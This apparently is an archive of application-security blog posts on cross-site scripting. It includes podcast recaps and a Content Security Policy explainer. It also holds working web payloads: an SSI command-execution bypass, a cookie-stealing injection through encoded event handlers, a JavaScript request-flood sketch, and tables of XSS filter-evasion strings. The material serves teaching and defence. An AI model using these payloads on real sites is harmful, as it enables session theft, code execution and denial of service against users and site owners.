Tag Archives: Cross Site Scripting

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavily database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests using different parameter/value pairs each time, to bypass caching servers like Varnish. Ultimately it’s never a good idea for an adversary to run this kind of code directly, because the flood would come from their own IP address. Instead, it’s much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
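As a rough sketch of the cache-busting idea (hypothetical helper names, not the actual FlashFlood code): every request carries a never-before-seen parameter/value pair, so a caching layer like Varnish treats each URL as a miss and passes it through to the origin.

```javascript
// Hypothetical sketch of the cache-busting concept, not the real FlashFlood code.
// Each generated URL carries a unique parameter/value pair, so caching layers
// such as Varnish see every request as a cache miss and hit the origin server.
function cacheBustingUrl(base) {
  const key = 'p' + Math.random().toString(36).slice(2);
  const value = Date.now().toString(36) + Math.random().toString(36).slice(2);
  return base + '?' + key + '=' + value;
}

// In a browser, a flood loop might fire beacons along these lines:
//   setInterval(() => { new Image().src = cacheBustingUrl('http://victim.example/'); }, 10);
```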

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior when it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of our modern-day knowledge about web application security to 20-year-old tech? So I took a look at the web board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, a number of vulns have been found in it over the years – four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found, but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past Perl regexes if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit, so you had to break it up into two chunks that execute together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention that Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it works on modern browsers more reliably than SSI does on websites.
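To see why, here is WWWBoard’s substitution ported to JavaScript as a sketch: the pattern only removes complete <...> tags, so an injection that simply omits its closing angle bracket sails straight through.

```javascript
// The WWWBoard tag-stripping regex, ported from Perl for illustration:
// it removes anything that looks like a *complete* <...> tag.
function stripTags(value) {
  return value.replace(/<([^>]|\n)*>/g, '');
}

const complete = '<img src="x" onerror="alert(1)">';
const unterminated = '<img src="" onerror=\'alert("XSS");\'';

stripTags(complete);      // complete tag: stripped entirely
stripTags(unterminated);  // no closing > anywhere: left untouched
```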

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried all over the web in long-forgotten but still-functional places. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things were, and how little security there really was, when the web was in its infancy.

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability uncovered in the very popular jQuery Validation Plugin. This plugin is widely used as a simple form validator, and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. The bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 to 1 million websites potentially using it or similar vulnerable code. The piece that amused all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging, it turned out the bug had already been in OSVDB since 2013 with no action taken. After Ruwhof warned the plugin’s author again and published the research publicly, the bug was closed within 17 hours. A nice little case study in full disclosure.

Next, Jeremiah covered the launch of a new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news, since there are a ton of CAs out there already, but what makes Let’s Encrypt interesting is that it is a non-profit, *FREE* certificate authority. The project is backed by the EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers, and is focused on being free and easy to use in order to reduce the barrier to entry of encrypting your web traffic. Robert brings up a good question about browser support: if Microsoft or Google doesn’t support this right away, it really only helps the 20% or so of users on Firefox. The other question here is what effect this will have on for-profit certificate authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google collects about you. None of this was terribly surprising to many of us in the industry, but it was certainly eye-opening for a lot of people out there. You can easily look up the advertising profile Google keeps on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief, I’m not into Reggaeton). However, the creepy one for me was the “Location History,” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing, as Mozilla also announced that it will be switching Firefox’s default search engine to Yahoo. This is HUGE news, considering that somewhere upwards of 95% of Mozilla’s revenue comes from Google paying to be the default engine. Firefox also still has 20% browser market share, all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States saying that police are allowed to compel people to provide biometric-based authentication, but not password-based authentication. For example, the judge held that it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone, but not to force you to reveal a four-digit PIN. This has all sorts of interesting implications for information security and personal privacy where law enforcement is concerned.

With absolutely no segue, we covered a new story about China, which seems to be one of Robert’s favorite topics. It turns out that China published a list of a ton of newly blocked websites, and one that stood out was Edgecast. Edgecast was particularly interesting because on its own it isn’t a notable website; it is a CDN, which means China has blocked all of its customers as well, potentially affecting hundreds of thousands of sites. The comparison was made to blocking Akamai. It will be fascinating to see what the repercussions are as we go.

We closed out this week by chatting about some extra precautions we are all taking these days on the modern, dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

#HackerKast 8: Recap of JPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake for being cold in Texas, we started off this week’s HackerKast with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not one of their main webpages but a one-off, brochureware-type site built to promote and organize a company-sponsored running race.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security, who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points, and cashing out. One major weakness pointed out here is that most of these services protect your reward points account with just a four-digit PIN. Robert makes a great point here: even if they move from four-digit PINs to a password system, that only makes brute forcing more difficult – if the bad guys find value here, they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion-network version of Facebook that has been set up to allow anonymous use of the site. There is the obvious use case of people trying to browse at work without getting in trouble, but the more important one is people in oppressive countries who want to get information out without worrying about persecution and their personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik, who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug, but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface, but they allowed you to upload this JSON file, which carried some additional configs and inputs for SEO tags. This file was not sanitized, so an XSS injection could be stored – making the XSS both persistent and deliverable via file upload. Pretty juicy stuff!

Finally, we wrapped up talking about Google some more, with a bypass of Gmail two-factor authentication. Specifically, the attack in question went after the text-message implementation of the 2FA rather than the token app that Google puts out. There are a number of ways this can happen, but the particular, most recent story involves attackers calling up mobile providers and social-engineering their way into access to the victim’s text messages, capturing the second-factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Content Security Policy

What is it and why should I care?
Content Security Policy (CSP) is a new(ish) technology, put together by Mozilla, that web apps can use as an additional layer of protection against Cross-Site Scripting (XSS); protection against XSS is CSP’s primary goal. A secondary goal is to protect against clickjacking.

XSS is a complex issue, as is evident by the recommendations in the OWASP prevention “cheat sheets” for XSS in general and DOM based XSS. Overall, CSP does several things to help app developers deal with XSS.

Whitelist Content Locations
One reason XSS is quite harmful is that browsers implicitly trust the content received from the server, even if that content has been manipulated and is loading from an unintended location. This is where CSP provides protection from XSS: CSP allows app developers to declare a whitelist of trusted locations for content. Browsers that understand CSP will then respect that list, load only content from there, and ignore content that references locations outside the list.

No Inline Scripts
XSS is able to add scripts inline to content, because browsers have no way of knowing whether the site actually sent that content, or if an attacker added the script to the site content. CSP entirely prevents this by forcing the separation of content and code (great design!). However, this means that you must move all of your scripts to external files, which will require work for most apps − although it can be done. The upside of needing to follow this procedure is that in order for an attack to be successful with CSP, an attacker must be able to:
Step 1.  Inject a script tag at the head of your page
Step 2.  Make that script tag load from a trusted site within your whitelist
Step 3.  Control the referenced script at that trusted site

Thus, CSP makes an XSS attack significantly more difficult.

Note: One question that consistently comes up is: what about event handling? Inline onXXX handler attributes count as inline script, so CSP blocks them; event handling still works, but it must be wired up from your external scripts via the addEventListener mechanism.

No Code from Strings (eval dies)
Another welcome addition to CSP is the blacklisting of functions that create code from strings. This means that usage of the evil eval is eliminated (along with other eval-like constructs such as new Function() and the string forms of setTimeout/setInterval). Creating code from strings is a popular attack technique − and is rather difficult to trace − so the removal of all such functions is actually quite helpful.

Another common question stemming from the use of CSP is how to deal with JSON parsing. From a security perspective, the right way to do this has always been to actually parse the JSON instead of doing an eval anyway; and because this functionality is still available, nothing needs to change in this regard.
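A quick sketch of the point: parsing JSON as data needs no eval at all, so CSP’s ban on creating code from strings costs nothing here.

```javascript
// Parsing JSON as data (no code execution): exactly the functionality that
// remains available under CSP's ban on creating code from strings.
const raw = '{"user":"alice","admin":false}';

const data = JSON.parse(raw);            // safe: parses data, never runs code
// const legacy = eval('(' + raw + ')'); // the old pattern that CSP forbids
```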

Policy Violation Reporting
A rather cool feature of CSP is that you can configure your site with a violation-reporting handler, which gives you that data whether you run in report-only mode or enforcing mode. In report-only mode, you can get reports of the places in your site where execution would be prevented once you enable CSP (a nice way to test). In enforcing mode you also get this data, so in production you can use it as a simple XSS detection mechanism (“bad guy tried XSS and it didn’t run”).

What should I do about the availability of CSP?

Well, you should use it! CSP has essentially no downside: it’s there to make your site safer, and even if a client’s browser does not support it, it is entirely backwards-compatible, so your site will not break for that client.

In general, I think the basic approach with CSP should be:

Step 1.  Solve XSS through your standard security development practices (you should already be doing this)
Step 2.  Learn about CSP – read the specs thoroughly
Step 3.  Make the changes to your site; then test and re-test (normal dev process)
Step 4.  Run in report-only mode and monitor any violations in order to find areas you still need to fix (this step can be skipped if you have a fully functional test suite that you can execute against your app in testing – good for you, if you do!)
Step 5. After you’re confident that your site is working properly, turn it on to the enforcing mode

As for how you actually implement CSP, you have two basic options: (1) an HTTP header, and (2) a META tag. The header option is preferred, and an example is listed below:

Content-Security-Policy: default-src 'self';

img-src *;

object-src media1.example.com media2.example.com *.cdn.example.com;

script-src trustedscripts.example.com;

report-uri http://example.com/post-csp-report

The example above says the following:

Line 1: By default, only allow content from 'self', i.e., the site represented by the current URL
Line 2: Allow images from anywhere
Line 3: Allow objects from only the listed URLs
Line 4: Allow scripts from only the listed URL
Line 5: Use the listed URL to report any violations of the specified policy

In summary, CSP is a very interesting and useful new technology to help battle XSS. It’s definitely a useful tool to add to your arsenal.

References
________________________________________________________
https://developer.mozilla.org/en/Introducing_Content_Security_Policy
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
https://wiki.mozilla.org/Security/CSP/Design_Considerations
https://wiki.mozilla.org/Security/CSP/Specification
https://dvcs.w3.org/hg/content-security-policy/raw-file/bcf1c45f312f/csp-unofficial-draft-20110303.html
http://www.w3.org/TR/CSP/
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/
https://mikewest.org/2011/10/content-security-policy-a-primer
http://codesecure.blogspot.com/2012/01/content-security-policy-csp.html
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html

It’s a DOM Event

All user input must be properly escaped and encoded to prevent cross-site scripting. While the idea of sanitizing user input is nothing new to most developers, many of them encode special characters and fail to account for how the resulting document will handle the input. HTML encoding without proper escaping can lead to malicious code execution in the DOM.

Be sure to note that all of the following descriptions and comments are dependent on how the application output encodes the related content and, therefore, may not reflect the actual injection.


HTML Events

HTML events serve as a method to execute client-side script when related conditions are met within the containing HTML document. User-supplied input can be encoded in the related HTML; however, when the event’s condition is met, the document will decode the injection before sending it to the JavaScript engine for interpretation. Consider the example below of an embedded image that evaluates “userInput” when a user clicks on the image:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput');" />

Now here’s the same image that has been hi-jacked by an attacker with an encoded payload:

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput&#000000039;);sendHaxor(document.cookie);//');" />

The hacker’s injection uses HTML decimal entity encoding, with multiple zeros to demonstrate support for padding. When a user interacts with the altered image, the DOM will evaluate the original function, followed by the hacker’s injection, followed by double slashes that comment out the trailing residue of the original syntax. All of the character encodings presented immediately below work across all current browsers, with the exception of the HTML named-entity apostrophe in Internet Explorer.
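A sketch of the decoding step (simplified to decimal references only) shows why the padding doesn’t matter: the browser normalizes the attribute value before the JavaScript engine ever sees it.

```javascript
// Simplified decoder for HTML decimal character references, enough to show
// that zero-padded forms like &#000000039; decode identically to &#39;.
function decodeDecimalEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(Number(n)));
}

const attr = "doSomethingCool('userInput&#000000039;);sendHaxor(document.cookie);//');";
const seenByJs = decodeDecimalEntities(attr);
// seenByJs now contains a real apostrophe where the entity was, closing the
// original string and letting sendHaxor(document.cookie) execute on click.
```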


Vulnerable HTML Encoding

Decimal entity: &#39; (zero padding also accepted, e.g. &#0000039;)
Hexadecimal entity: &#x27;
Named entity: &apos; (the one Internet Explorer does not decode)

Javascript HREF/SRC

When JavaScript is referenced in either the HREF or SRC of an HTML element, an attacker can achieve code injection using the same method as above, but with additional support for URL hex encoding. The DOM will construct the related JavaScript location before evaluating its contents. Here’s a dynamic link that, when followed, does something “cool” with user input:

<a href="javascript:doSomethingCool('userInput');">Cool Link</a>

The hacker likes the “super-cool” link so much that he decides to add his own content to capture the user’s session:

<a href="javascript:doSomethingCool('userInput%27);sendHaxor(document.cookie);//');">Cool Link</a>


Remediation

The lesson to be learned here is that encoding alone may not be enough to stop cross-site scripting. Therefore, encode all special characters to prevent an attacker from breaking the resulting HTML; escape each character to prevent breaking any related JavaScript; and, of course, always remember to escape the escapes.

<img src="CoolPic.jpg" onclick="doSomethingCool('userInput\\\&#39;);attackerBlocked();//');" />
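A sketch of that layered remediation (hypothetical helper names): escape for the JavaScript string context first, then encode for the HTML attribute context, with the escapes themselves escaped.

```javascript
// Hypothetical helpers illustrating the layered defense described above.
// Order matters: backslashes are escaped first ("escape the escapes").
function escapeJsString(s) {
  return s.replace(/\\/g, '\\\\')
          .replace(/'/g, "\\'")
          .replace(/"/g, '\\"');
}

function encodeHtmlAttr(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

const userInput = "');attackerPayload();//";
const safe = encodeHtmlAttr(escapeJsString(userInput));
// The quote reaches the DOM as \&#39; and decodes to an escaped \' inside the
// JavaScript string, so it can no longer break out.
```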

 
Jason Calvert @mystech7
Application Security Engineer
WhiteHat Security, Inc.

Escaping Escapes

Sometimes a server will escape special characters that are injected: For instance, injecting a " character and having it reflect as \":

Injection: xss"
Reflection:

x="xss\"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"
Reflection:

x="xss\\"";y=42;

Success!

However, if the server escapes your injected \ as \\, this technique will not work:

Injection: xss\"
Reflection:

x="xss\\\"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*\"
Reflection:

x="xss\\"*alert(1)*\\"";y=42;

The *\\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss\"*alert(1)//
Reflection:

x="xss\\"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do.

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.
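The whole dance can be simulated in a sketch (alert is stubbed so the payload’s firing can be observed, and eval stands in for the browser parsing the reflected script):

```javascript
// Simulate a naive server-side filter that escapes quotes but not backslashes,
// then "render" the page's script block with eval to see if the payload fires.
function naiveFilter(input) {
  return input.replace(/"/g, '\\"'); // escapes " but forgets about \
}

let fired = 0;
const alert = () => { fired++; }; // stub so we can observe execution
let x, y;

const injection = 'xss\\"*alert(1)//';          // the characters: xss\"*alert(1)//
const script = 'x="' + naiveFilter(injection) + '";y=42;';
// script is now: x="xss\\"*alert(1)//";y=42;  -- the injected backslash
// neutralizes the filter's escape, the string closes, and the payload runs.
eval(script);
```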

Anatomy of an XSS Injection

I love XSS, especially in JavaScript space. It’s like a puzzle. Sometimes it’s a four-piece jumbo jigsaw puzzle, like landing in an empty script tag with no filtering or encoding, but other times it’s a 10,000-piece mystery, requiring a complex injection to overcome multiple obstacles. Either way, it’s always satisfying when that ‘1’, ‘xss’, or ‘lol’ pops up in an alert window.

Break Out, Execute Payload, Blend In

There are typically three pieces to an XSS injection: break out, execute payload, and blend in.  Consider the following:

Injection:  xss
Reflection:

<script>x="xss";y=42;</script>

In order to execute payload, we have to break out of the double-quoted string we’re landing in.

Injection (break out):  xss";
Reflection:

<script>x="xss";";y=42;</script>

We’ve now broken out and terminated the x= line of code; it’s time to inject some payload.

Injection (break out + execute payload):  xss";alert(1);
Reflection:

<script>x="xss";alert(1);";y=42;</script>

Our payload is in place, but the "; following our injection is not proper syntax and will cause an error; we need to blend back in to the remaining code.

Injection (break out + execute payload + blend in):  xss";alert(1);//
Reflection:

<script>x="xss";alert(1);//";y=42;</script>

By adding a comment, our injection now results in syntactically correct code that will execute our payload successfully.

Sometimes there’s nothing to break out of or blend back into, but often both are necessary in some degree to ensure that the code is syntactically valid and that the payload is executable.
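The three stages can be verified with a quick simulation (a sketch: alert is stubbed, and eval stands in for the browser parsing the script block; note that eval parses the whole program first, so broken syntax never executes at all):

```javascript
// Simulate the server reflecting input into a script block, then "load" it.
function reflect(input) { return 'x="' + input + '";y=42;'; }

let fired = 0;
const alert = () => { fired++; }; // stub to observe payload execution
let x, y;

function load(js) {
  try { eval(js); return 'ran'; }
  catch (e) { return e.name; }
}

load(reflect('xss'));               // 'ran': harmless
load(reflect('xss";alert(1);'));    // 'SyntaxError': the dangling ";y=42; breaks parsing
load(reflect('xss";alert(1);//'));  // 'ran': the comment blends in, alert fires
```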

Complex Breakouts

Sometimes the code path doesn’t allow your injection to fire, like when landing inside a function that’s never called on the page. In those instances, assuming that you can’t use </script> to break out, you must break out of any strings you’re in, as well as the actual function.  Furthermore, the end of your injection must blend back in to whatever code follows:

Injection:  xss
Reflection:

function neverCalledOnThePage()
{
x="xss";
}

Injection:  xss"}alert(1);if(0){//
Reflection:

function neverCalledOnThePage()
{
x="xss"}alert(1);if(0){//";
}

Helpful tips for dealing with this type of scenario are highly dependent on context, so I won’t go into any more detail here. Basically, break out from as little as is needed in order to get into executed space, and be as minimalistic as possible when blending back in to the code (use a comment, if possible). Replicating exactly what was present before you broke out is usually not necessary; however, referencing what was present is useful when crafting a syntactically correct blend back in to the code.

Filter Evasion: Concatenation & JavaScript Operators

In my previous post, I talked about the basic anatomy of an XSS injection: break out, execute payload, and blend in. While the anatomy is simple in principle, things can become more complex when filters, escaping, and encoding enter the mix.

One of the examples I used in the previous post was as follows:

Injection: xss";alert(1);//
Reflection:

<script>x="xss";alert(1);//";y=42;</script>

Staying with this example, let’s say we are unable to add any of the following characters: / < > ; What then? Some of you are familiar with using string concatenation to execute XSS, like this:

Injection: xss"%2balert(1)%2b"
Reflection:

<script>x="xss"+alert(1)+"";y=42;</script>

In JavaScript, the ‘+’ is simply an operator. How it will be interpreted will differ depending on the context. In some cases (x="hi "+"there"), it will be seen as string concatenation; but when applied to numbers (x=40+2), it will be seen as a mathematical operator. Because JavaScript checks basic syntax only before executing, operators other than the ‘+’ can be used; for example, an asterisk:

Injection: "*alert(1)*"
Reflection:

<script>x=""*alert(1)*"";y=42;</script>

Used as a mathematical operator, the asterisk obviously will not compute anything meaningful when applied to strings (unless the strings can be parsed as numeric, like x="6"*"7"), so the JavaScript engine will readily accept the injection because it is syntactically correct.

The engine must first evaluate the alert(1) function call before it can evaluate the strings and asterisks. This is like the order of operations in mathematics: 3*2+1=7, but 3*(2+1)=9.  That is, the parentheses take precedence in the order of operations, just as the alert(1) function call takes precedence in the order of execution with code.  And, therefore, as long as valid JavaScript operators connect the function call to the surrounding operands, all will be merry and grand in the land of exploits.

Assuming there are no filtering obstacles to overcome, the following mathematical, logical, and bitwise operators can be used in our injection without violating syntax, and will result in our alert being executed:

Operator Injection Reflection
Addition & String Concatenation "%2balert(1)%2b" <script>x=""+alert(1)+"";y=42;</script>
Subtraction "-alert(1)-" <script>x=""-alert(1)-"";y=42;</script>
Multiplication "*alert(1)*" <script>x=""*alert(1)*"";y=42;</script>
Division "/alert(1)/" <script>x=""/alert(1)/"";y=42;</script>
Modulus; %25 needs to reflect as %. "%25alert(1)%25" <script>x=""%alert(1)%"";y=42;</script>
“Less Than” Comparison "<alert(1)<" <script>x=""<alert(1)<"";y=42;</script>
“Greater Than” Comparison ">alert(1)>" <script>x="">alert(1)>"";y=42;</script>
“Less Than or Equal To” Comparison "<=alert(1)<=" <script>x=""<=alert(1)<="";y=42;</script>
“Greater Than or Equal To” Comparison ">=alert(1)>=" <script>x="">=alert(1)>="";y=42;</script>
“Equal To” Comparison "==alert(1)==" <script>x=""==alert(1)=="";y=42;</script>
Strong-Typed “Equal To” Comparison "===alert(1)===" <script>x=""===alert(1)==="";y=42;</script>
“Not Equal To” Comparison "!=alert(1)!=" <script>x=""!=alert(1)!="";y=42;</script>
Logical “and”; %26 needs to reflect as &. Note: will only result in payload executing if the preceding string is evaluated as “true” by the JS engine (i.e., non-empty), since && short-circuits. "%26%26alert(1)%26%26" <script>x=""&&alert(1)&&"";y=42;</script>
Logical “or”; Note: will only result in payload executing if preceding string is evaluated as “false” by the JS engine, like an empty string. "||alert(1)||" <script>x=""||alert(1)||"";y=42;</script>
Bitwise “and”; %26 needs to reflect as &. "%26alert(1)%26" <script>x=""&alert(1)&"";y=42;</script>
Bitwise “or” "|alert(1)|" <script>x=""|alert(1)|"";y=42;</script>
Bitwise “xor” "^alert(1)^" <script>x=""^alert(1)^"";y=42;</script>
Bitwise Left Shift "<<alert(1)<<" <script>x=""<<alert(1)<<"";y=42;</script>
Bitwise Right Shift ">>alert(1)>>" <script>x="">>alert(1)>>"";y=42;</script>
Bitwise Right Shift With Zeros ">>>alert(1)>>>" <script>x="">>>alert(1)>>>"";y=42;</script>
Ternary Conditional Expression; Note: will only result in payload executing if the preceding string is evaluated as “true” by the JS engine – with a falsy string, the else branch runs instead. "?alert(1):" <script>x=""?alert(1):"";y=42;</script>
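The always-evaluated operators in the table can be checked mechanically (a sketch with alert stubbed; the short-circuiting &&, ||, and ternary only evaluate the payload when the surrounding string operands cooperate):

```javascript
// Verify that each operator yields syntactically valid code in which the
// alert operand is evaluated. alert is stubbed so firing can be counted.
let x, y;

function fires(op) {
  let fired = 0;
  const alert = () => { fired++; };
  eval('x=""' + op + 'alert(1)' + op + '"";y=42;');
  return fired === 1;
}

const alwaysEvaluated = ['+', '-', '*', '/', '%', '<', '>', '<=', '>=',
                         '==', '===', '!=', '&', '|', '^', '<<', '>>', '>>>'];
const all = alwaysEvaluated.every((op) => fires(op));

// Short-circuit caveat: with an empty (falsy) left-hand string, && never
// reaches the payload, while || does.
const andFires = fires('&&'); // false here, because "" is falsy
const orFires = fires('||');  // true
```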


You may be asking, “Why bother listing << if simply < can be used?” I’m so glad you asked!  The answer is this: Every application is unique, and you never know when < might get filtered out, while << does not.

Overall it’s always good to know as many options as possible, because even the most unlikely one may end up being the key.